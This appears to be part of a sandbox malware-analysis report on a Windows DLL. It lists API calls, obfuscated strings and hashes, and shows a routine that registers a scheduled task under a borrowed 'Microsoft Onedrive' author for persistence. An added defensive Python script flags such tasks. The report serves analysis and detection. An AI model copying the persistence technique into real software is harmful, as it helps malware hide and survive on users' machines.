              • RtlAllocateHeap.NTDLL(00000008,00000001,6F9EAAAA,?,6F9EDA5C,00000001,00000364,00000007,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7,F08BD84D), ref: 6F9EFA19
                • Part of subcall function 6F9EC30C: mydllmain.DLL1(?,00000001,?,6F9EFA0B,00000001,?,6F9EDA5C,00000001,00000364,00000007,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7), ref: 6F9EC322
              Similarity
              • API ID: AllocateHeapmydllmain
              • String ID:
              • API String ID: 2479503475-0
              • Opcode ID: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction ID: 793bc27fe7137431ded9fd8a40187b7b36361ab248c44a1d3b11f6180b3413a5
              • Opcode Fuzzy Hash: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction Fuzzy Hash: 37F0B436345626ABEF535A26B905A9A379CBF8577CB118117AC18AE1C4FB20E40186E1

               Control-flow graph (interactive graph not reproduced): function at 6f9e1000, 3 basic blocks spanning 6f9e1000-6f9e1014; calls 6f9e2959 and ExitProcess
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction ID: 9000987cb098be165034ac60058ec63f69ca38bdac99d9a8f45fba4bf5daea90
              • Opcode Fuzzy Hash: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction Fuzzy Hash: 16B09B3559534296E2415B60444CB1D77545F52257F04C415E169800D4CA20C0958A72
              APIs
              • CoInitialize.OLE32(00000000), ref: 6F9E1D40
              • CoCreateInstance.OLE32(6F9FB200,00000000,00000001,6F9FB1F0,?), ref: 6F9E1D59
              • CoUninitialize.OLE32 ref: 6F9E1D70
              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000001), ref: 6F9E1DAF
              • VariantInit.OLEAUT32(?), ref: 6F9E1DD0
              • VariantInit.OLEAUT32(?), ref: 6F9E1DE4
              • VariantInit.OLEAUT32(?), ref: 6F9E1DF8
              • VariantInit.OLEAUT32(?), ref: 6F9E1E0C
              • VariantClear.OLEAUT32(?), ref: 6F9E1E5B
              • VariantClear.OLEAUT32(?), ref: 6F9E1E61
              • VariantClear.OLEAUT32(?), ref: 6F9E1E67
              Strings
              • Cannot put trigger ID: %x, xrefs: 6F9E2084
              • Error saving the Task : %x, xrefs: 6F9E22D3
              • Cannot get Root Folder pointer: %x, xrefs: 6F9E1ED1
              • QueryInterface call failed for IExecAction: %x, xrefs: 6F9E215B
              • Failed to create an instance of ITaskService: %x, xrefs: 6F9E1D64
              • Microsoft Onedrive, xrefs: 6F9E1F2C
              • QueryInterface call failed on IRegistrationTrigger: %x, xrefs: 6F9E2040
              • Cannot get Task collection pointer: %x, xrefs: 6F9E2102
              • Cannot get identification pointer: %x, xrefs: 6F9E1F22
              • ITaskService::Connect failed: %x, xrefs: 6F9E1E78
              • Cannot put identification info: %x, xrefs: 6F9E1F6F
              • WlrMakeService, xrefs: 6F9E2252
              • Trigger1, xrefs: 6F9E204A
              • Cannot put the action executable path: %x, xrefs: 6F9E21F2
              • Cannot create action: %x, xrefs: 6F9E212D
              • Cannot put setting info: %x, xrefs: 6F9E1FC7
              • Cannot put registration trigger delay: %x, xrefs: 6F9E20E3
              • Success! Task successfully registered. , xrefs: 6F9E22F9
              • Failed to create a task definition: %x, xrefs: 6F9E1EF9
              • Cannot get settings pointer: %x, xrefs: 6F9E1F8E
              • Cannot get trigger collection: %x, xrefs: 6F9E1FE6
              • Cannot create a registration trigger: %x, xrefs: 6F9E2012
              Similarity
              • API ID: Variant$Init$Clear$CreateEnvironmentExpandInitializeInstanceStringsUninitialize
              • String ID: Success! Task successfully registered. $Cannot create a registration trigger: %x$Cannot create action: %x$Cannot get Task collection pointer: %x$Cannot get identification pointer: %x$Cannot get settings pointer: %x$Cannot get trigger collection: %x$Cannot put identification info: %x$Cannot put registration trigger delay: %x$Cannot put setting info: %x$Cannot put the action executable path: %x$Cannot put trigger ID: %x$Error saving the Task : %x$QueryInterface call failed for IExecAction: %x$QueryInterface call failed on IRegistrationTrigger: %x$Cannot get Root Folder pointer: %x$Failed to create a task definition: %x$Failed to create an instance of ITaskService: %x$ITaskService::Connect failed: %x$Microsoft Onedrive$Trigger1$WlrMakeService
              • API String ID: 2658831686-3566640006
              • Opcode ID: 42c6695a63a82ec08f74a29ff94488245a172e16815c6168eb2322a71d64c092
              • Instruction ID: d9b91a67c93a6e78633f593e4d5d2cefa0e9f9397211ab5a18d0edac01286241
              • Opcode Fuzzy Hash: 42c6695a63a82ec08f74a29ff94488245a172e16815c6168eb2322a71d64c092
              • Instruction Fuzzy Hash: EE22827190425AEFDB15DF64D848EEE77B9FF8A318F104258F805AB280DB31E946CB90
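               The API sequence and error strings of this function are those of the Task Scheduler 2.0 COM API (ITaskService::Connect, ITaskDefinition, IRegistrationTrigger, IExecAction, RegisterTaskDefinition), and the error strings are verbatim those of Microsoft's "Registration Trigger Example". Matching the xrefs of the three non-error literals against that sample's call order suggests that "Microsoft Onedrive" is the task author (it sits between the identification-pointer and put-identification errors), "Trigger1" the trigger ID, and "WlrMakeService" the task name passed to RegisterTaskDefinition; this is an inference from ordering, not something the report states. The executable path goes through ExpandEnvironmentStringsW, so it contains a %VAR% reference the report does not show. The Python hunting script below is an added example, not code from the sample, from Microsoft or from Joe Sandbox: it parses task XML of the kind this routine would leave under C:\Windows\System32\Tasks and flags a registration trigger (the action fires as soon as the task is saved), an action that resolves outside the Windows and Program Files trees, and a vendor-looking name or author paired with such an action. The embedded task XML, the %APPDATA% command path and the environment mapping are constructed for the example.

```python
import os
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Roots from which legitimately installed software normally runs (lower-case).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Vendor words that malware borrows for task names and authors.
VENDOR_WORDS = ("microsoft", "onedrive", "windows", "google", "adobe")


def parse_task_xml(data):
    """Extract the triage-relevant fields from a Task Scheduler XML body.

    Accepts str or bytes. Files under System32\\Tasks are UTF-16 with a BOM,
    so bytes are decoded accordingly; the XML declaration is dropped so the
    parser does not trip over the encoding it names.
    """
    if isinstance(data, bytes):
        bom16 = data[:2] in (b"\xff\xfe", b"\xfe\xff")
        data = data.decode("utf-16" if bom16 else "utf-8")
    data = re.sub(r"^\s*<\?xml[^>]*\?>", "", data)
    root = ET.fromstring(data)
    uri = root.findtext(f"{NS}RegistrationInfo/{NS}URI") or ""
    reg = root.findall(f"{NS}Triggers/{NS}RegistrationTrigger")
    return {
        "name": uri.rsplit("\\", 1)[-1],
        "author": root.findtext(f"{NS}RegistrationInfo/{NS}Author") or "",
        "registration_trigger": bool(reg),
        "trigger_ids": [t.get("id", "") for t in reg],
        "delay": reg[0].findtext(f"{NS}Delay") if reg else None,
        "commands": [c.text or "" for c in root.iter(f"{NS}Command")],
    }


def expand_env(path, env):
    """Expand %VAR% references from the given mapping (what ExpandEnvironmentStringsW does)."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def triage(task, env):
    """Return the reasons a parsed task deserves a second look (empty list if none)."""
    reasons = []
    if task["registration_trigger"]:
        reasons.append("registration trigger: action runs as soon as the task is saved")
    vendor_named = any(w in (task["name"] + task["author"]).lower() for w in VENDOR_WORDS)
    for cmd in task["commands"]:
        full = expand_env(cmd, env).strip('"').lower()
        if not full.startswith(TRUSTED_ROOTS):
            reasons.append(f"action runs from an untrusted location: {full}")
            if vendor_named:
                reasons.append("vendor-looking task name/author paired with a non-vendor binary")
    return reasons


def scan_tasks_dir(root=r"C:\Windows\System32\Tasks", env=None):
    """Walk the live task store and map each suspicious task file to its reasons."""
    env = dict(os.environ) if env is None else env
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    task = parse_task_xml(fh.read())
            except (OSError, ET.ParseError):
                continue
            reasons = triage(task, env)
            if reasons:
                findings[path] = reasons
    return findings


# Constructed sample XML: the shape this routine would register, with an assumed %APPDATA% path.
SAMPLE_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Onedrive</Author><URI>\\WlrMakeService</URI></RegistrationInfo>
  <Triggers><RegistrationTrigger id="Trigger1"><Enabled>true</Enabled><Delay>PT30S</Delay></RegistrationTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%APPDATA%\\OneDrive\\update.exe</Command></Exec></Actions>
</Task>"""

# Constructed benign counterpart: vendor name, vendor path, ordinary logon trigger.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author><URI>\\Microsoft\\Windows\\OneDrive\\Update</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>"C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"</Command></Exec></Actions>
</Task>"""

SAMPLE_ENV = {"APPDATA": r"C:\Users\user\AppData\Roaming"}  # constructed environment

if __name__ == "__main__":
    for label, xml in (("sample", SAMPLE_TASK), ("benign", BENIGN_TASK)):
        task = parse_task_xml(xml)
        print(label, task["name"], triage(task, SAMPLE_ENV) or "nothing to report")
```

               On a live host, call scan_tasks_dir() with no arguments; it walks the task store with the real environment, so a %APPDATA% or %TEMP% path resolves to the user's profile and is reported. The trusted-root list is deliberately short: a task whose action lives outside those trees is not necessarily malicious, but together with a registration trigger and a borrowed vendor name it is the pattern this function produces.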
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 91b34507051fe9f31d01e62d44a0af69232916f8a11847d24c2a85ea0013aa40
              • Instruction ID: c48f016673b61acb54d54f818d155a5d64e5a312ad74a542c43b3dd8e3dca4d4
              • Opcode Fuzzy Hash: 91b34507051fe9f31d01e62d44a0af69232916f8a11847d24c2a85ea0013aa40
              • Instruction Fuzzy Hash: 2AD23871E092298FDB65CE28DD407DAB7B9FB45315F1441EAD40DE7280E778AE828F41
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction ID: 6e0fe9c455517ca4ead514f86fe4a5d5c69521affc67d2775cd3a8e353982d36
              • Opcode Fuzzy Hash: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction Fuzzy Hash: 96025E71E012199BDB14CFADDA806DEB7F5FF88314F14826AD915EB384D731A9428F90
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6F9E374D
              • IsDebuggerPresent.KERNEL32 ref: 6F9E3819
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9E3832
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9E383C
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction ID: a35412e01fa201132d4c5444e81ecfd5f67bf1429ad383b26fa6d6b0c2bcf7c0
              • Opcode Fuzzy Hash: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction Fuzzy Hash: D6310875D05319EBDF21DFA4D949BCDBBB8AF18304F1041EAE40DAB290EB719A848F45
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6F9EC172
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6F9EC17C
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 6F9EC189
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: df33e72198aceb93eba27497aa5d6791d5f0a88dfaf25e23bf4750e8e5e12e76
              • Instruction ID: 9a796f4e88f29907c47a4aea313fe28bd90ca6e8093beb72380f037720f1c0b5
              • Opcode Fuzzy Hash: df33e72198aceb93eba27497aa5d6791d5f0a88dfaf25e23bf4750e8e5e12e76
              • Instruction Fuzzy Hash: 2D31A575901329ABDB22DF64D888BCDBBB8BF18314F5041EAE41CA7291E7749B858F44
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,00000001,?,00000008,?,?,6F9F9BE4,00000001,?,00000008,?,?,6F9F97E7,00000000), ref: 6F9F9E16
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: 1b54de9015dfd97799804d48c1d8105219401e29f71e2ea8fb72b0241768bb05
              • Instruction ID: f8a69a502fdf11d5a0b5d6556b46e9a22f72768f07db72a17154e050929c31ba
              • Opcode Fuzzy Hash: 1b54de9015dfd97799804d48c1d8105219401e29f71e2ea8fb72b0241768bb05
              • Instruction Fuzzy Hash: EFB148326116089FD715CF28C8C6B947BE0FF45364F258659E8AACF2E9C335E992CB40
              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6F9E3951
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: f063a102fc9946367629e0a4957dbcdc03eaa772091a71ce787751ddcf8e69a3
              • Instruction ID: 5df9622af877a4032c20dd2cd6249b77914a125c593f47192cf8f04d45815c09
              • Opcode Fuzzy Hash: f063a102fc9946367629e0a4957dbcdc03eaa772091a71ce787751ddcf8e69a3
              • Instruction Fuzzy Hash: 1A517971A11B05DBDB05CFA5D482BAABBF4FF49324F24842AC456EB290D374E952CF50
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf0f4584f5fb8ecc1ba6e2a29e950920d34b015d340d4787425328992d0b3ead
              • Instruction ID: 2cf6508e19fc3d7f144c0c794b6b019c1df9d9de40abe03163b42e44b6f33b80
              • Opcode Fuzzy Hash: cf0f4584f5fb8ecc1ba6e2a29e950920d34b015d340d4787425328992d0b3ead
              • Instruction Fuzzy Hash: F441CEB5805219AFDB10CF69CC88AEABBBDEF46304F1042D9E459A3281DB30DE858F50
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 999d3df1e6961e85f05bda3add7c00601db71f4952dcc481a5d522e6c43df2c2
              • Instruction ID: 2fd35aeaf432c7a600526511de097037144542132c5e7f748419c6925ee756b7
              • Opcode Fuzzy Hash: 999d3df1e6961e85f05bda3add7c00601db71f4952dcc481a5d522e6c43df2c2
              • Instruction Fuzzy Hash: 69D1E030A0470A8FCB26CF68C580AAAB7F9FF49314F14461ED56A9B2D9D731F981CB15
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 774b4a31dcc9c4379088ea65bffab2e8ba880496b2367c1d3941ce7173daa150
              • Instruction ID: f54276375cea88c81972c5849074aa4fbdbb9cf687abc8718ad1cf828b7fa8cd
              • Opcode Fuzzy Hash: 774b4a31dcc9c4379088ea65bffab2e8ba880496b2367c1d3941ce7173daa150
              • Instruction Fuzzy Hash: 7BC1E230A007469FCB27CF68C5807AABBB9EF06344F10461ED5669B6E9D332F949CB51
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: d42ed90b3f0a4c7b80331462578af12523d19412393b94d7123c2264b1ce264a
              • Instruction ID: 879fc0ca6596c8f731399cef3e81d534b9cdfa68c673ea9e4815f3842875dc35
              • Opcode Fuzzy Hash: d42ed90b3f0a4c7b80331462578af12523d19412393b94d7123c2264b1ce264a
              • Instruction Fuzzy Hash: DDA012306016018B5B004E30630420C35E8760A1A534440185604C0004D72040214A00
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b9de71bf78ba9155069d861d1f844954c84bd632519fd0e087cf5370068b3e6
              • Instruction ID: bf4771016720a95c73b2e361a8cf9011fa09eeba57248de0b108727e2f8e29c6
              • Opcode Fuzzy Hash: 6b9de71bf78ba9155069d861d1f844954c84bd632519fd0e087cf5370068b3e6
              • Instruction Fuzzy Hash: 96B1067090471A8BCB17CE78C5906AEB7B9AF85708F00061FD8669B6D9EB31F646CB41
              APIs
              • GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
              • _strlen.LIBCMT ref: 6F9E12CA
              • GetProcAddress.KERNEL32(?), ref: 6F9E1318
              • _strlen.LIBCMT ref: 6F9E1336
              • GetProcAddress.KERNEL32(?), ref: 6F9E137E
              • _strlen.LIBCMT ref: 6F9E13A1
              • GetProcAddress.KERNEL32(?), ref: 6F9E13E7
              Strings
              • kernel32.dll, xrefs: 6F9E12A6
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6F9E1320
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6F9E12B1
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6F9E138B
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              • Opcode ID: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction ID: d6edb42e3ec7574594b70c827e0a6a6c5876ce9c5f3f3e786e12283e5015a1b7
              • Opcode Fuzzy Hash: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction Fuzzy Hash: 3F41A171D007489BDB26DFF4EC909AE7BB8BF69208F54842ED951D3282EB359905CB10
              APIs
                • Part of subcall function 6F9F6340: CreateFileW.KERNEL32(00000000,00000000,?,6F9F66A2,?,?,00000000,?,6F9F66A2,00000000,0000000C), ref: 6F9F635D
              • GetLastError.KERNEL32 ref: 6F9F670D
              • __dosmaperr.LIBCMT ref: 6F9F6714
              • GetFileType.KERNEL32(00000000), ref: 6F9F6720
              • GetLastError.KERNEL32 ref: 6F9F672A
              • __dosmaperr.LIBCMT ref: 6F9F6733
              • CloseHandle.KERNEL32(00000000), ref: 6F9F6753
              • CloseHandle.KERNEL32(00000000), ref: 6F9F68A0
              • GetLastError.KERNEL32 ref: 6F9F68D2
              • __dosmaperr.LIBCMT ref: 6F9F68D9
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction ID: 828bf70aabec8da5f72e49fbffe0f4d003aabd93dbe7dc05b85f7a33ae7ee12c
              • Opcode Fuzzy Hash: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction Fuzzy Hash: 2CA10E32A157059BCF099F68D851BAD3BB5AF07328F28025DE8119F2D2CB35D823CB91
              APIs
              • mydllmain.DLL1(00000000,?), ref: 6F9F6A97
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
              • Instruction ID: afd562df5538cbba07914ef7081aaad4251653abe29e440ad01e48ce1ccfee6b
              • Opcode Fuzzy Hash: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
              • Instruction Fuzzy Hash: 9DE14C31E0522A8BCB75CF288D947DDB7B5AF9A300F1581E9C999A7340D671AEC1CF90
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6F9E4F49
              • ___TypeMatch.LIBVCRUNTIME ref: 6F9E5057
              • _UnwindNestedFrames.LIBCMT ref: 6F9E51A9
              • CallUnexpected.LIBVCRUNTIME ref: 6F9E51C4
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction ID: dcb7577ef46a413af80cc7edb809be7dd44db4107f8aecf8dffd11f69d67dc73
              • Opcode Fuzzy Hash: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction Fuzzy Hash: 18B18879800309EFCF16DFA8D88099EBBB9BF14314F10456AE815AB2D6D731EA51CF91
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 6F9E48C7
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6F9E48CF
              • _ValidateLocalCookies.LIBCMT ref: 6F9E4958
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6F9E4983
              • mydllmain.DLL1(?,00000001), ref: 6F9E499C
              • _ValidateLocalCookies.LIBCMT ref: 6F9E49D8
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_recordmydllmain
              • String ID: csm
              • API String ID: 2845398917-1018135373
              • Opcode ID: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction ID: 21fb42a514ff7f82a3bed27f9cef5fe730e8158c28642f6dcdd3b1be25258db8
              • Opcode Fuzzy Hash: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction Fuzzy Hash: F141A438A00209AFCF01CF6CD880A9EBBB5BF45728F108155D924AB3D2D735EA16CF91
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              APIs
              • FreeLibrary.KERNEL32(00000000,?,6F9EFB92,6F9E60D4,B586E81C,00000000,6F9EAAAA,00000000,?,6F9EFD0B,00000022,FlsSetValue,6F9FD4F0,ccs,6F9EAAAA), ref: 6F9EFB44
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,456EBF13,6F9EAAAA,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7DB
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F9EC7ED
              • mydllmain.DLL1(B586E81C,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7FE
              • FreeLibrary.KERNEL32(00000000,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC80F
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProcmydllmain
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 361333426-1276376045
              APIs
              • GetLastError.KERNEL32(00000001,?,6F9E4A71,6F9E3517,6F9E2EE4,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215), ref: 6F9E4B01
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F9E4B0F
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F9E4B28
              • SetLastError.KERNEL32(00000000,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215,?,00000001,?), ref: 6F9E4B7A
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              Strings
              • C:\Windows\system32\loaddll32.exe, xrefs: 6F9F2194
              Similarity
              • API ID:
              • String ID: C:\Windows\system32\loaddll32.exe
              • API String ID: 0-1062229814
              APIs
              • __alloca_probe_16.LIBCMT ref: 6F9F70F9
              • __alloca_probe_16.LIBCMT ref: 6F9F71C2
              • __freea.LIBCMT ref: 6F9F7229
                • Part of subcall function 6F9EE7FE: HeapAlloc.KERNEL32(00000000,6F9F26F1,?,?,6F9F26F1,00000220,?,?,?), ref: 6F9EE830
              • __freea.LIBCMT ref: 6F9F723C
              • __freea.LIBCMT ref: 6F9F7249
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocHeap
              • String ID:
              • API String ID: 1096550386-0
              APIs
              • mydllmain.DLL1(6FA020D0,00000010,6F9E4D45,?,?,?,?,6FA020F0,00000008,6F9E4DC9,?,?,?,00000000), ref: 6F9E4C32
              • ___AdjustPointer.LIBCMT ref: 6F9E4C9A
              • ___AdjustPointer.LIBCMT ref: 6F9E4CBD
              • ___AdjustPointer.LIBCMT ref: 6F9E4D59
              Similarity
              • API ID: AdjustPointer$mydllmain
              • String ID:
              • API String ID: 3586548312-0
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6177
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E627E
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6291
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: 5q
              • API String ID: 885266447-1627527040
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree), ref: 6F9E5C0F
              • GetLastError.KERNEL32(?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree,00000000,?,6F9E4BC8), ref: 6F9E5C19
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6F9E5C41
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              APIs
              • GetConsoleOutputCP.KERNEL32(456EBF13,00000000,00000000,?), ref: 6F9F09C9
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F9F0C1B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F9F0C61
              • GetLastError.KERNEL32 ref: 6F9F0D04
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              APIs
              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6F9F8ACF), ref: 6F9F917C
              • mydllmain.DLL1(00000001,?,?), ref: 6F9F92F0
              • mydllmain.DLL1(00000002,?,?), ref: 6F9F9336
              Similarity
              • API ID: mydllmain$DecodePointer
              • String ID:
              • API String ID: 253863441-0
              APIs
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • GetLastError.KERNEL32 ref: 6F9F1A78
              • __dosmaperr.LIBCMT ref: 6F9F1A7F
              • GetLastError.KERNEL32(?,?,?,?), ref: 6F9F1AB9
              • __dosmaperr.LIBCMT ref: 6F9F1AC0
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6F9F2D70
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DA8
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DC8
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000), ref: 6F9F82E4
              • GetLastError.KERNEL32(?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?,?,6F9F1332,00000000), ref: 6F9F82F0
                • Part of subcall function 6F9F82B6: CloseHandle.KERNEL32(FFFFFFFE,6F9F8300,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?), ref: 6F9F82C6
              • ___initconout.LIBCMT ref: 6F9F8300
                • Part of subcall function 6F9F8278: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F9F82A7,6F9F694E,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F828B
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F8315
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              APIs
              • EncodePointer.KERNEL32(00000000,?), ref: 6F9E51F4
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              APIs
